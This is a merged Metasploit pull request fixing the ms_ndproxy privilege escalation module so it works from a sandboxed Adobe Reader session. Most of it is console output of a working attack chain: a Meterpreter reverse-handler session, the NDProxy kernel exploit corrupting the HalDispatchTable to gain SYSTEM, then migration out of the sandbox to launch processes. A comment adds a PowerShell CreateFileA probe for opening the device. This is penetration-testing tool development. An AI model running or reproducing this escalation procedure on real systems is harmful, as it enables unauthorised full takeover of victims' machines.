Fix ms_ndproxy to work under a sandboxed Reader #2773

Merged
merged 3 commits into from Dec 17, 2013

Conversation

jvazquez-r7
Contributor

Short history: I just learned from the malware in the wild how to CreateFile on a device to exploit ms_ndproxy under a sandboxed Reader.

Verification

  • Get a session from a sandboxed Reader, using modules/exploits/windows/fileformat/reader_toolbutton for example. You shouldn't be able to migrate or execute new processes:
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.244:1042) at 2013-12-16 16:28:00 -0600

meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System                  4294967295                                 
 168   680   svchost.exe             4294967295                                 
 300   680   jqs.exe                 4294967295                                 
 404   680   alg.exe                 4294967295                                 
 560   4     smss.exe                4294967295                                 
 612   560   csrss.exe               4294967295                                 
 636   560   winlogon.exe            4294967295                                 
 680   636   services.exe            4294967295                                 
 692   636   lsass.exe               4294967295                                 
 804   680   vmtoolsd.exe            4294967295                                 
 848   680   vmacthlp.exe            4294967295                                 
 864   680   svchost.exe             4294967295                                 
 944   680   svchost.exe             4294967295                                 
 1036  680   svchost.exe             4294967295                                 
 1096  680   svchost.exe             4294967295                                 
 1332  680   svchost.exe             4294967295                                 
 1468  1448  explorer.exe            4294967295                                 
 1564  680   spoolsv.exe             4294967295                                 
 1780  1468  VMwareTray.exe          4294967295                                 
 1788  1468  vmtoolsd.exe            4294967295                                 
 1796  1800  jucheck.exe             4294967295                                 
 1800  1468  jusched.exe             4294967295                                 
 1812  1468  rundll32.exe            4294967295                                 
 1848  1468  ctfmon.exe              4294967295                                 
 2404  1468  cmd.exe                 4294967295                                 
 2472  1036  wscntfy.exe             4294967295                                 
 3140  1036  wuauclt.exe             4294967295                                 
 3260  1468  procexp.exe             4294967295                                 
 3320  864   wmiprvse.exe            4294967295                                 
 3488  1468  AcroRd32.exe            4294967295                                 
 3516  3488  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

  • Use the old exploits/windows/local/ms_ndproxy to elevate the session; it should fail when trying to open the device.
  • Switch to this pull request. Use the new exploits/windows/local/ms_ndproxy to elevate the session; it should work, even though it will only elevate the process, because the sandbox still prevents execution of new processes:
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 4
session => 4
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
msf exploit(ms_ndproxy) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
  • Even though the elevated session is SYSTEM, the sandbox still prevents execution of new processes. But now you should be able to migrate and then execute:
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0           NT AUTHORITY\SYSTEM            
 168   680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe
 3488  1468  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3516  3488  AcroRd32.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2172 created.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0                                          
 168   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0                                          C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2172  2404  calc.exe          x86   0           JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe


meterpreter > exit
[*] Shutting down Meterpreter...

@kernelsmith
Contributor

very interesting. Nice catch @jvazquez-r7 !
For the record, this MSDN page http://msdn.microsoft.com/en-us/library/windows/desktop/aa363874(v=vs.85).aspx explains the share mode being 0 a little (5th and 6th paragraphs).

@jvazquez-r7 "Unknown" is misspelled in the authors section. I would do a PR to your PR, but it doesn't seem worth the effort for such a little thing.
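The PR description says the fix is in how the module calls CreateFile on \\.\NDProxy from inside the sandbox, and the comment above points at the dwShareMode paragraphs of the CreateFile documentation. The following is an added example, not the Metasploit module's code and not the diff from this PR: a small PowerShell probe that P/Invokes CreateFileA against a device path with a chosen share mode and reports whether the handle opened and, if not, the Win32 error. It assumes the relevant difference is share mode 0 (exclusive) versus FILE_SHARE_READ|FILE_SHARE_WRITE (3); that pairing, the GENERIC_READ|GENERIC_WRITE access, and the Test-DeviceOpen function name are assumptions for illustration. Run it once from a normal shell and once from inside the process you are testing (for example via a Meterpreter-spawned PowerShell) to compare the results.

```powershell
# Added example (not the ms_ndproxy module's code): probe whether the current
# process can open a Windows device object with CreateFileA for a given
# dwShareMode and report the Win32 error on failure.
# Device path, access mask and the share modes compared are assumptions.
$sig = @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
public static extern IntPtr CreateFileA(
    string lpFileName, uint dwDesiredAccess, uint dwShareMode,
    IntPtr lpSecurityAttributes, uint dwCreationDisposition,
    uint dwFlagsAndAttributes, IntPtr hTemplateFile);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
$K32 = Add-Type -MemberDefinition $sig -Name 'K32' -Namespace 'DeviceProbe' -PassThru

$GENERIC_READ  = 0x80000000
$GENERIC_WRITE = 0x40000000
$OPEN_EXISTING = 3

function Test-DeviceOpen {
    param(
        [Parameter(Mandatory)] [string] $Device,    # e.g. '\\.\NDProxy'
        [Parameter(Mandatory)] [uint32] $ShareMode  # 0 = exclusive, 3 = FILE_SHARE_READ|FILE_SHARE_WRITE
    )
    $access = [uint32]($GENERIC_READ -bor $GENERIC_WRITE)
    $h = $K32::CreateFileA($Device, $access, $ShareMode,
                           [IntPtr]::Zero, $OPEN_EXISTING, 0, [IntPtr]::Zero)
    # Read the error immediately, before any other call can overwrite it.
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()

    if ($h.ToInt64() -eq -1) {           # INVALID_HANDLE_VALUE
        [PSCustomObject]@{
            Device = $Device; ShareMode = $ShareMode; Opened = $false
            Win32Error = $err
            Message = (New-Object ComponentModel.Win32Exception $err).Message
        }
    } else {
        $null = $K32::CloseHandle($h)
        [PSCustomObject]@{
            Device = $Device; ShareMode = $ShareMode; Opened = $true
            Win32Error = 0; Message = 'OK'
        }
    }
}

# Compare an exclusive open (0) with a shared open (3) against the device.
foreach ($mode in @(0, 3)) {
    Test-DeviceOpen -Device '\\.\NDProxy' -ShareMode $mode
}
```

A failed open returns the Win32 error code alongside its text (for example ERROR_ACCESS_DENIED or ERROR_SHARING_VIOLATION), so running the probe from the sandboxed process and from an unsandboxed one shows directly which call the sandbox lets through, without involving the exploit itself.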

@wchen-r7
Contributor

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:59433) at 2013-12-16 20:27:58 -0600

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > show options

Module options (exploit/windows/local/ms_ndproxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms_ndproxy) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Will fix the typo.

@wchen-r7
Contributor

Never mind, juan fixed the typo. Merging.

@wchen-r7 wchen-r7 merged commit 52cb43e into rapid7:master Dec 17, 2013
@jvazquez-r7 jvazquez-r7 deleted the fix_ndproxy branch November 18, 2014 15:47